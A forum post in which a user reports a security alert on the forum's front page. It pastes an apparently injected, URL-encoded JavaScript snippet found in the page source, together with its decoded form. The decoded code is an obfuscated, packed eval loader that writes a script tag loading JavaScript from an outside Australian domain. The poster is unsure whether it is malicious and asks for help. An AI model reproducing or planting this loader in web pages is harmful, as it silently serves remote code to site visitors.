This came up this morning on the main forum page:
URL:
http://laykz.tetuku.com/images.php?tProcess: file://C:\Program Files (x86)\Internet E...
Infection: al
Unfortunately I clicked away before I viewed the source. I did go 'back' to the page, but I'm not sure whether it would show it up or not. I took a look through the source but didn't find anything unusual except a batch of URL code which, when decoded, is a javascript. It doesn't look malicious though, but does have a website reference which I don't see in any advertising or anything? It's probably entirely normal (as I don't really have any real experience with javascript beyond 'Hello World') but I'll post the info here anyway. I reloaded the page and the code is still there. I only really query it because it looks unusual as it's in URL encoded text. *shrugs*
It was at line 2024:
CODE
<script type="text/javascript">document.write(unescape('<script%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%65%76%61%6C%28%66%75%6E%63%74%69%6F%6E%28%70%2C%61%2C%63%2C%6B%2C%65%2C%72%29%7B%65%3D%66%75%6E%63%74%69%6F%6E%28%63%29%7B%72%65%74%75%72%6E%20%63%2E%74%6F%53%74%72%69%6E%67%28%61%29%7D%3B%69%66%28%21%27%27%2E%72%65%70%6C%61%63%65%28%2F%5E%2F%2C%53%74%72%69%6E%67%29%29%7B%77%68%69%6C%65%28%63%2D%2D%29%72%5B%65%28%63%29%5D%3D%6B%5B%63%5D%7C%7C%65%28%63%29%3B%6B%3D%5B%66%75%6E%63%74%69%6F%6E%28%65%29%7B%72%65%74%75%72%6E%20%72%5B%65%5D%7D%5D%3B%65%3D%66%75%6E%63%74%69%6F%6E%28%29%7B%72%65%74%75%72%6E%27%5C%5C%77%2B%27%7D%3B%63%3D%31%7D%3B%77%68%69%6C%65%28%63%2D%2D%29%69%66%28%6B%5B%63%5D%29%70%3D%70%2E%72%65%70%6C%61%63%65%28%6E%65%77%20%52%65%67%45%78%70%28%27%5C%5C%62%27%2B%65%28%63%29%2B%27%5C%5C%62%27%2C%27%67%27%29%2C%6B%5B%63%5D%29%3B%72%65%74%75%72%6E%20%70%7D%28%27%31%2E%32%28%5C%27%3C%30%20%33%3D%22%34%2F%35%22%20%36%3D%22%37%3A%2F%2F%38%2E%39%2E%61%2F%62%2F%63%2F%64%2E%65%22%3E%3C%2F%30%3E%5C%27%29%27%2C%31%35%2C%31%35%2C%27%73%63%72%69%70%74%7C%64%6F%63%75%6D%65%6E%74%7C%77%72%69%74%65%7C%74%79%70%65%7C%74%65%78%74%7C%6A%61%76%61%73%63%72%69%70%74%7C%73%72%63%7C%68%74%74%70%7C%67%6F%62%75%79%6C%6F%63%61%6C%7C%63%6F%6D%7C%61%75%7C%63%6F%6D%70%6F%6E%65%6E%74%73%7C%63%6F%6D%5F%63%6E%74%7C%63%6E%74%7C%6A%73%27%2E%73%70%6C%69%74%28%27%7C%27%29%2C%30%2C%7B%7D%29%29%3C%2F%73%63%72%69%70%74%3E'))</script>
Decoded it reads:
CODE
<script type="text/javascript">eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('1.2(\'<0 3="4/5" 6="7://8.9.a/b/c/d.e"></0>\')',15,15,'script|document|write|type|text|javascript|src|http|gobuylocal|com|au|components|com_cnt|cnt|js'.split('|'),0,{}))</script>')
I don't really know what gobuylocal stuff is? Again, it doesn't look overly malicious, but I just don't get why it is there?